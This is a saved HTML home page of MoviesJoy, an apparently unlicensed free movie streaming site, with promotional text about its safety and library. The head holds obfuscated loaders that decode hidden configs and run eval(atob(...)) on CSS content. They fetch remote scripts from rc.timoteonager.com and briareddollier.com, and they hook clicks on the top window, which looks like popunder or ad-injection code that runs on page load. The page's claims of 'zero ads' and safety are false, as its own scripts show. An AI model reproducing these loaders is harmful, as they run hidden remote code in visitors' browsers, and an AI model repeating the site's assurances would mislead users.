
<html>
<head><style class="darkreader darkreader--fallback" media="screen">html, body, body :not(iframe) {
background-color: #181a1b !important;
border-color: #776e62 !important;
color: #e8e6e3 !important;
}</style><style class="darkreader darkreader--text" media="screen"></style><style class="darkreader darkreader--invert" media="screen">.jfk-bubble.gtx-bubble, .captcheck_answer_label > input + img, span#closed_text > img[src^="https://www.gstatic.com/images/branding/googlelogo"], span[data-href^="https://www.hcaptcha.com/"] > #icon, #bit-notification-bar-iframe, ::-webkit-calendar-picker-indicator, .logo {
filter: invert(100%) hue-rotate(180deg) contrast(90%) !important;
}</style><style class="darkreader darkreader--inline" media="screen">[data-darkreader-inline-bgcolor] {
background-color: var(--darkreader-inline-bgcolor) !important;
}
[data-darkreader-inline-bgimage] {
background-image: var(--darkreader-inline-bgimage) !important;
}
[data-darkreader-inline-border] {
border-color: var(--darkreader-inline-border) !important;
}
[data-darkreader-inline-border-bottom] {
border-bottom-color: var(--darkreader-inline-border-bottom) !important;
}
[data-darkreader-inline-border-left] {
border-left-color: var(--darkreader-inline-border-left) !important;
}
[data-darkreader-inline-border-right] {
border-right-color: var(--darkreader-inline-border-right) !important;
}
[data-darkreader-inline-border-top] {
border-top-color: var(--darkreader-inline-border-top) !important;
}
[data-darkreader-inline-boxshadow] {
box-shadow: var(--darkreader-inline-boxshadow) !important;
}
[data-darkreader-inline-color] {
color: var(--darkreader-inline-color) !important;
}
[data-darkreader-inline-fill] {
fill: var(--darkreader-inline-fill) !important;
}
[data-darkreader-inline-stroke] {
stroke: var(--darkreader-inline-stroke) !important;
}
[data-darkreader-inline-outline] {
outline-color: var(--darkreader-inline-outline) !important;
}
[data-darkreader-inline-stopcolor] {
stop-color: var(--darkreader-inline-stopcolor) !important;
}</style><style class="darkreader darkreader--variables" media="screen">:root {
--darkreader-neutral-background: #131516;
--darkreader-neutral-text: #d8d4cf;
--darkreader-selection-background: #004daa;
--darkreader-selection-text: #e8e6e3;
}</style><style class="darkreader darkreader--root-vars" media="screen"></style><style class="darkreader darkreader--user-agent" media="screen">html {
background-color: #181a1b !important;
}
html, body, input, textarea, select, button {
background-color: #181a1b;
}
html, body, input, textarea, select, button {
border-color: #736b5e;
color: #e8e6e3;
}
a {
color: #3391ff;
}
table {
border-color: #545b5e;
}
::placeholder {
color: #b2aba1;
}
input:-webkit-autofill,
textarea:-webkit-autofill,
select:-webkit-autofill {
background-color: #555b00 !important;
color: #e8e6e3 !important;
}
::selection {
background-color: #004daa !important;
color: #e8e6e3 !important;
}
::-moz-selection {
background-color: #004daa !important;
color: #e8e6e3 !important;
}</style>
<title>(2) New Messages!</title>
<meta name="robots" content="index, follow">
<meta name="revisit-after" content="1 days">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="content-language" content="en">
<meta name="description" content="Watch HD Movies online and Stream latest tv-series, Over 200000 videos to stream in HD with English and Spanish subtitle. Join MoviesJoy today to begin watching movies online.">
<meta name="keywords" content="free movies streaming, watch movies online, watch tv-series, full hd movies online, free tv-series online, watch hd movies free, watch series online, watch the walking dead online, watch prison break online, watch family guy online">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="/images/group_1/theme_8/favicon.png" type="image/x-icon">
<meta property="og:type" content="website">
<meta property="og:url" content="https://moviesjoy.to/">
<meta property="og:title" content="MoviesJoy - Free movies streaming, watch movies online">
<meta property="og:image" content="https://moviesjoy.to/images/group_1/theme_8/capture.jpg?v=0.3">
<meta property="og:image:width" content="650">
<meta property="og:image:height" content="350">
<meta property="og:description" content="Watch HD Movies online and Stream latest tv-series, Over 200000 videos to stream in HD with English and Spanish subtitle. Join MoviesJoy today to begin watching movies online.">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<!--Begin: Stylesheet-->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css">
<link rel="stylesheet" href="/css/group_1/theme_8/home.css?v=0.3">
<!--End: Stylesheet-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js"></script><meta name="darkreader" content="486b87eb4ba541d484992aede61f4b2d"><style class="darkreader darkreader--override" media="screen">.vimvixen-hint {
background-color: #7b5300 !important;
border-color: #d8b013 !important;
color: #f3e8c8 !important;
}
::placeholder {
opacity: 0.5 !important;
}
#edge-translate-panel-body,
.MuiTypography-body1 {
color: var(--darkreader-neutral-text) !important;
}
gr-main-header {
background-color: #0f3a48 !important;
}
.tou-z65h9k,
.tou-mignzq,
.tou-1b6i2ox,
.tou-lnqlqk {
background-color: var(--darkreader-neutral-background) !important;
}
.tou-75mvi {
background-color: #032029 !important;
}
.tou-ta9e87,
.tou-1w3fhi0,
.tou-1b8t2us,
.tou-py7lfi,
.tou-1lpmd9d,
.tou-1frrtv8,
.tou-17ezmgn {
background-color: #0a0a0a !important;
}
.tou-uknfeu {
background-color: #231603 !important;
}
.tou-6i3zyv {
background-color: #19576c !important;
}
embed[type="application/pdf"][src="about:blank"] { filter: invert(100%) contrast(90%); }</style>
<script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-127877694-1"></script>
<script type="text/javascript">
window.dataLayer = window.dataLayer || [];
function gtag() {
dataLayer.push(arguments);
}
gtag('js', new Date());
gtag('config', 'UA-127877694-1');
</script>
<link rel="preload" href="https://rc.timoteonager.com/r6440d4449b1806440d4449b181/24218" as="script"><script type="application/javascript">(()=>{"use strict";var __webpack_modules__={8554:(e,_,r)=>{r.d(_,{Z:()=>t});const t=(e,_)=>{const r=_.length/2,t=_.substr(0,r),c=_.substr(r);return JSON.parse(e.split('').map((e=>{const _=c.indexOf(e);return-1!==_?t[_]:e})).join(''))}},886:(e,_,r)=>{r.d(_,{br:()=>t,ly:()=>a,zn:()=>c});const t='loading',c='interactive',a='complete'},9679:(e,_,r)=>{r.d(_,{on:()=>t.Z,zn:()=>c.zn});var t=r(4938),c=r(886)},4938:(e,_,r)=>{r.d(_,{Z:()=>o});var t=r(886);const c={[t.br]:0,[t.zn]:1,[t.ly]:2},a=e=>c[document.readyState]>=c[e],o=(e,_)=>{a(e)?_():((e,_)=>{const r=()=>{a(e)&&(document.removeEventListener('readystatechange',r),_())};document.addEventListener('readystatechange',r)})(e,_)}}},__webpack_module_cache__={};function __webpack_require__(e){var _=__webpack_module_cache__[e];if(void 0!==_)return _.exports;var r=__webpack_module_cache__[e]={exports:{}};return __webpack_modules__[e](r,r.exports,__webpack_require__),r.exports}__webpack_require__.d=(e,_)=>{for(var r in _)__webpack_require__.o(_,r)&&!__webpack_require__.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:_[r]})},__webpack_require__.o=(e,_)=>Object.prototype.hasOwnProperty.call(e,_);var __webpack_exports__={};(()=>{var Core_delivery_decode__WEBPACK_IMPORTED_MODULE_1__=__webpack_require__(8554),Core_dom__WEBPACK_IMPORTED_MODULE_0__=__webpack_require__(9679);const{fn,key,url,target}=(0,Core_delivery_decode__WEBPACK_IMPORTED_MODULE_1__.Z)('{\"7vdt37\":\"\\/i71z3.cii?cy=aqa6au6\",\"me\":\"wqcwl5lm6ucgqv33hho0lvmqou3amq5h\",\"s31\":\"o3v5ya0algy3hylcogoa0hvc6u6l0uhg\",\"pdz\":\"4778i:\\/\\/fs.ep09i7pecpdi7.ckj\"}','abcdefghijklmnopqrstuvwxyz0123456789vyc03mt49fszjek8ndi7prx21bqawlu5hg6o'),insert=e=>{try{document.head?document.head.appendChild(e):(0,Core_dom__WEBPACK_IMPORTED_MODULE_0__.on)(Core_dom__WEBPACK_IMPORTED_MODULE_0__.zn,(()=>{try{document.head.appendChild(e)}catch(e){}}))}catch(e){}};window[fn]=domain=>new Promise(((resolve,reject)=>{const fallback=localStorage.getItem(key);if(fallback&&domain!==fallback)resolve({url:fallback,quit:!1});else{localStorage.removeItem(key);const link=document.createElement('link');link.href=`${url}${target}`,link.rel='stylesheet',link.onerror=reject,link.onload=()=>{const div=document.createElement('div');div.classList.add('content-quote'),document.head.append(div);const fallback=atob(eval(getComputedStyle(div,':after').getPropertyValue('content')));resolve({url:fallback,quit:!0}),localStorage.setItem(key,fallback),div.remove(),link.remove()},insert(link)}}))})()})();</script><script type="application/javascript">(()=>{"use strict";const t=(t,n)=>{const o=n.length/2,c=n.substr(0,o),e=n.substr(o);return JSON.parse(t.split('').map((t=>{const n=e.indexOf(t);return-1!==n?c[n]:t})).join(''))},n='interactive',o={loading:0,[n]:1,complete:2},c=t=>o[document.readyState]>=o[t],e=(t,n)=>{c(t)?n():((t,n)=>{const o=()=>{c(t)&&(document.removeEventListener('readystatechange',o),n())};document.addEventListener('readystatechange',o)})(t,n)},r=function(){},w=t=>{'function'==typeof window.gpp&&window.gpp(t)},i=(()=>'ontouchstart'in window||!!navigator.maxTouchPoints)()?'pointerup':'pointerdown';if((()=>{try{return window.self!==window.top}catch(t){return!0}})())try{if(!window.top)throw new Error('');window.top.addEventListener(i,w,!0)}catch(t){try{window.parent.addEventListener(i,w,!0)}catch(t){window.addEventListener(i,w,!0)}}else window.addEventListener('pointerdown',w,!0);const{fn:d,key:a,url:u,target:s}=t('{\"f6qlhf\":\"\\/qzyyunyyyk7rguzyyunyyyk7rgr\\/0y0rg\",\"i8\":\"0ua0twtigyaxu6hhzzknt6iukyhriuwz\",\"3he\":\"kh6w7rnrtx7hz7takxkrnz6agygtnyzx\",\"vqb\":\"jffo9:\\/\\/qa.fp15fh586lhq.a51\"}','abcdefghijklmnopqrstuvwxyz012345678967anhiljp43b185o2q9fvcdmesur0tywzxgk'),h=(t,o)=>{const c=document.createElement('script');c.src=`${t}${s}`,c.onerror=()=>{o||window[d](t).then((t=>{c.remove(),h(t.url,t.quit)})).catch(r)},(t=>{try{document.head?document.head.appendChild(t):e(n,(()=>{try{document.head.appendChild(t)}catch(t){}}))}catch(t){}})(c)};h(localStorage.getItem(a)||u,!1)})();</script><script src="https://rc.timoteonager.com/r6440d4449b1806440d4449b181/24218"></script>
<style>
.pagetual_pageBar{
-moz-transition:opacity 0.3s ease-in-out 0s;
-webkit-transition:opacity 0.3s ease-in-out 0s;
transition:opacity 0.3s ease-in-out 0s;
font-family: Arial,sans-serif !important;
}
.pagetual_pageBar.stop {
-webkit-filter: invert(100%);
filter: invert(100%);
opacity: 1!important;
}
.pagetual_pageBar.hide {
display: none!important;
}
.pagetual_pageBar:hover {
opacity: 1!important;
}
.pagetual_pageBar span {
vertical-align: super;
}
.pagetual_pageBar a>span {
margin-top: 0!important;
opacity: 0;
-moz-transition:all 0.3s ease-in-out 0s;
-webkit-transition:all 0.3s ease-in-out 0s;
transition:all 0.3s ease-in-out 0s;
}
.pagetual_pageBar a>span:hover {
color: red;
}
.pagetual_pageBar a:hover>span {
opacity: 1;
}
.pagetual_pageBar a:hover>span.prev {
margin-top: -30px!important;
}
.pagetual_pageBar a:hover>span.next {
margin-top: 30px!important;
}
.pagetual_pageBar span>svg {
-moz-transition:transform 0.5s ease, opacity 0.3s ease;
-webkit-transition:transform 0.5s ease, opacity 0.3s ease;
transition:transform 0.5 ease, opacity 0.3s ease;
opacity: 0;
}
.pagetual_pageBar:hover span>svg {
opacity: 1;
}
.pagetual_pageBar span>svg.upSvg:hover {
transform: rotate(360deg) scale3d(1.2, 1.2, 1.2);
}
.pagetual_pageBar span>svg.downSvg:hover {
transform: rotate(540deg) scale3d(1.2, 1.2, 1.2)!important;
}
.pagetual_pageBar .pagetual_pageNum{
color: #55555f;
}
.pagetual_pageBar .pagetual_pageNum:hover{
color: #ff6464;
}
.pagetual_tipsWords{
font-size: 50px;
font-weight: bold;
font-family: "黑体", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto",
"Oxygen", "Ubuntu", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
"Segoe UI Emoji", "Segoe UI Symbol";
color: #ffffff;
min-height: 70px;
line-height: 70px;
position: fixed;
left: 50%;
top: 10%;
margin-left: -150px;
padding: 0 10px;
z-index: 999999999;
background-color: #000;
border: 1px solid black;
border-radius: 10px;
opacity: 0;
filter: alpha(opacity=65);
box-shadow: 5px 5px 20px 0px #000;
-moz-transition:opacity 0.3s ease-in-out 0s;
-webkit-transition:opacity 0.3s ease-in-out 0s;
transition:opacity 0.3s ease-in-out 0s;
pointer-events: none;
}
.pagetual_loading {
width: 50px;
height: 50px;
margin: 10px auto;
border-radius: 100%;
-webkit-animation: pagetual_loading_scaleout 1.0s infinite ease-in-out;
animation: pagetual_loading_scaleout 1.0s infinite ease-in-out;
}
@-webkit-keyframes pagetual_loading_scaleout {
0% { -webkit-transform: scale(0.0) }
100% {
-webkit-transform: scale(1.0);
opacity: 0;
}
}
@keyframes pagetual_loading_scaleout {
0% {
transform: scale(0.0);
-webkit-transform: scale(0.0);
} 100% {
transform: scale(1.0);
-webkit-transform: scale(1.0);
opacity: 0;
}
}
.pagetual_loading_text {
-webkit-animation: pagetual_loading_opacity 2.6s infinite ease-in-out;
animation: pagetual_loading_opacity 2.6s infinite ease-in-out;
}
@-webkit-keyframes pagetual_loading_opacity {
0% { opacity: 1 }
50% { opacity: 0.2 }
100% { opacity: 1 }
}
@keyframes pagetual_loading_opacity {
0% { opacity: 1 }
50% { opacity: 0.2 }
100% { opacity: 1 }
}
</style><style class="darkreader darkreader--sync" media="screen"></style></head>
<body>
<div id="app"><div id="xwrapper"><div id="xheader"><div class="container"><a href="/" id="xlogo" title="MoviesJoy"><img src="/images/group_1/theme_8/logo.png?v=0.1" alt="Logo"> <div class="clearfix"></div></a> <div id="xheader_browser"><div class="header-btn"><i class="fas fa-bars mr-2"></i>Menu</div></div> <div id="xheader_menu"><ul class="nav header_menu-list"><li class="nav-item"><a href="/home" title="Home">Home</a></li> <li class="nav-item"><a href="/movie" title="Movies">Movies</a></li> <li class="nav-item"><a href="/tv-show" title="TV Shows">TV Shows</a></li> <li class="nav-item"><a href="/top-imdb" title="Top IMDB">Top IMDB</a></li></ul> <div class="clearfix"></div></div> <div class="clearfix"></div></div></div> <div id="xmain-wrapper"><div class="container"><div id="mw-home"><div class="mwh-logo"><a href="/home" title="MoviesJoy" class="mwh-logo-div"><img src="/images/group_1/theme_8/logo.png?v=0.1" alt="Logo"></a> <div class="clearfix"></div></div> <div class="text-center heading-center"><h6 class="mw-sitename">MoviesJoy</h6> <h1 class="mw-heading" style="display: none;">MoviesJoy - Free movies streaming, watch movies online</h1></div> <div id="xsearch" class="home-search"><div class="search-content"><form class="search-form"><div class="search-submit"><div class="search-icon"><i class="fa fa-search"></i></div></div> <input type="text" placeholder="Enter keywords..." class="form-control search-input"></form></div></div> <div data-url="https://moviesjoy.to/" class="sharethis-inline-share-buttons" style="margin-top: 20px; margin-bottom: 20px; text-align: center;"></div> <div class="mw-buttons text-center mb-5"><a href="/home" class="btn btn-lg btn-radius btn-primary">View
Full Site <i class="fas fa-arrow-circle-right ml-2"></i></a></div> <div class="mw-body mb-5"><p>Watch Free HD Movies and TV Series online on Moviesjoy.net - Moviesjoy.to</p> <p>MoviesJoy is where you find the saying "Happiness costs nothing" correct. All the movies on our site are free to watch, in HD quality, with subtitles, and there is no need for a signup or any subscription. <br>
If it is what you are looking for, give us a shot to convince you! </p> <p><span style="font-size: 18px;"><strong>What is MoviesJoy?</strong></span><br>
MoviesJoy is a streaming website where you can find almost any title that comes to mind to stream or download. We provide free movies and TV shows for every genre and occasion such as Action, Comedy, History, Thriller, Sports... New titles are updated on a daily basis to make sure you never need to leave.<br>
MoviesJoy is one of the biggest gems you can find when it comes to free online movie streaming. More than ten thousands of titles are free for you to watch online or download with zero ads. Normally movie enthusiasts have to pay for paid content or sit through multiple ads and popups, but at MoviesJoy, all you need is the Internet, a device, and your time to enjoy our contents. </p> <p><span style="font-size: 18px;"><strong>Is MoviesJoy Safe? Is it Legal to use MoviesJoy?</strong></span><br>
If you leave no information, no one can attack you! MoviesJoy doesn't require your name, your email, and your credit card number as we don't ask for a signup. Therefore, you can stay completely anonymous by using a VPN (if preferred). MoviesJoy has been a safe place for millions of users so rest assured, you can watch our movies and TV shows without worries. </p> <p><span style="font-size: 18px;"><strong>Alternative to Moviesjoy?</strong></span><br>
If for some reasons you can't access Moviesjoy.to website to watch free HD Movies, you can try other best alternative to Moviesjoy such as Himovies, ev01, tinyzone... etc</p> <p> </p> <p><span style="font-size: 18px;"><strong>Why MoviesJoy should be your movies streaming site? - Some good reviews about Moviesjoy</strong></span></p> <p style="margin-left: 40px;"><br> <strong>1. Safety</strong><br>
Because movies should bring you joy, not headaches, it is important to watch movies on a safe and reliable site only. And MoviesJoy lives up to its name, you will only find movies and joy here on our website. No signup or registration is needed to stream free movies and TV shows on MoviesJoy, so you can stay safe and sound without giving any information for hackers or unwanted parties to track you down. </p> <p style="margin-left: 40px;"><strong>2. Minimal UI design</strong><br>
MoviesJoy should be as easy as Google to browse and navigate. If you already have a title in mind, simply enter the keywords in the search box at the top of the site. Or if you are looking for something that catches your eye, you can use the site's categories to search or scroll down for our suggestions. </p> <p style="margin-left: 40px;"><strong>3. Extensive content library</strong><br>
With over 10,000 titles, MoviesJoy is confident to provide you whatever you are looking for. We update new movies and TV episodes on a daily basis and per request to make sure our users can catch up with the cinematic world as well as find gems that others recommend. We have almost everything, from Hollywood blockbusters to regional indies, from the latest releases to the oldies of your childhood. No matter what title comes to your mind, you are highly likely to find it here. </p> <p style="margin-left: 40px;"><strong>4. Streaming experience</strong><br>
MoviesJoy is where you get a premium watching experience without having to pay. With fast loading speed and seamless streaming feature, you can enjoy our contents with little to no buffering. At MoviesJoy, both the movies and joy are not interrupted.</p> <p style="margin-left: 40px;"><strong>5. Device compatibility</strong><br>
MoviesJoy is mobile-friendly and Chromecast supported so our users can enjoy free movies and TV shows on any device available, at anytime and from anywhere. You can start your day by streaming our movies on your way to work and end it in the comfort of your home. </p> <p style="margin-left: 40px;"><strong>6. Ads and popups</strong><br>
There are absolutely zero ads on our site. Once you hit on the play button, you can start streaming right away, without any interruptions in the middle. </p> <p style="margin-left: 40px;"><strong>7. Great customer care</strong><br>
At MoviesJoy, we understand that your experience comes first. Therefore, we try our best to listen to our users. Should there be any issue, please feel free to send us a message. Or if you cannot find a movie or TV show of interest, we are also on all ear to get your request. </p> <p>Your support is our source of joy, so please help us to spread the words and let your friends know about MoviesJoy.net too. Thank you!</p></div> <div class="mw-buttons text-center"><a href="/home" class="btn btn-lg btn-radius btn-primary">Go
to MoviesJoy <i class="fas fa-arrow-circle-right ml-2"></i></a></div></div></div></div> <div id="xfooter"><div class="container"><div class="footer-links"><ul class="ulclear"><li><a href="/android-movies-apk" title="Android App">Android App</a></li> <li><a href="/terms" title="Terms of service">Terms of service</a></li> <li><a href="/contact" title="Contact">Contact</a></li> <li><a href="/sitemap.xml" title="Sitemap">Sitemap</a></li> <li><a href="https://9animetv.to/" title="9anime" rel="dofollow" target="_blank">9anime</a></li></ul></div> <div class="clearfix"></div></div></div> <div id="xfooter-about"><div class="container"><div class="about-text">
MoviesJoy is a Free Movies streaming site with zero ads.
We let you watch movies online without having to register or paying, with over 10000 movies and
TV-Series.
You can also Download full movies from MoviesJoy and watch it later if you want.
</div> <p class="copyright">© MoviesJoy</p></div></div></div></div>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5da59293a14f83e9" async=""></script>
<script type="text/javascript" src="https://platform-api.sharethis.com/js/sharethis.js#property=6433be364f61b7001240a339&product=inline-share-buttons&source=platform" async="async"></script>
<script>var currPage = 'home_search';</script>
<script type="text/javascript" src="/js/group_1/app.min.js?v=6.3"></script>
<script data-cfasync="false" async="" type="text/javascript" src="//xc.briareddollier.com/fntabzMndrp/24578"></script>
<script>
$(document).ready(function () {
$("#xheader_browser").click(function (e) {
$("#xheader_menu, #xheader_browser").toggleClass("active");
});
});
</script>
<script type="text/javascript" id="ao_inject_js_pager" src="webkit-masked-url://hidden/"></script><div id="speechify-global-notifications"></div><div id="speechify-summarization-fullscreen-mode" style="position: fixed; inset: 0px; overflow: auto; background-color: white; z-index: 1999; display: none; --darkreader-inline-bgimage: initial; --darkreader-inline-bgcolor: #181a1b;" data-darkreader-inline-bgimage="" data-darkreader-inline-bgcolor=""></div><div id="speechify-mobile-player" style="z-index: 2147483645; pointer-events: none;"></div><div id="speechify-screenshot-mode" style="position: fixed; top: 0px; right: 0px; width: 100%; min-height: 100%; z-index: 9999; display: none;"></div></body><iframe style="width: 100% !important; height: 604px !important; margin: 0px; padding: 0px; border: none; outline: none; box-sizing: border-box; position: fixed; inset: 0px 0px auto auto !important; overflow: hidden; z-index: 2147483647; --darkreader-inline-border-top: initial; --darkreader-inline-border-right: initial; --darkreader-inline-border-bottom: initial; --darkreader-inline-border-left: initial; --darkreader-inline-outline: initial; min-width: 240px !important; display: block !important; max-width: 400px !important;" data-darkreader-inline-border-top="" data-darkreader-inline-border-right="" data-darkreader-inline-border-bottom="" data-darkreader-inline-border-left="" data-darkreader-inline-outline=""></iframe>
</html>

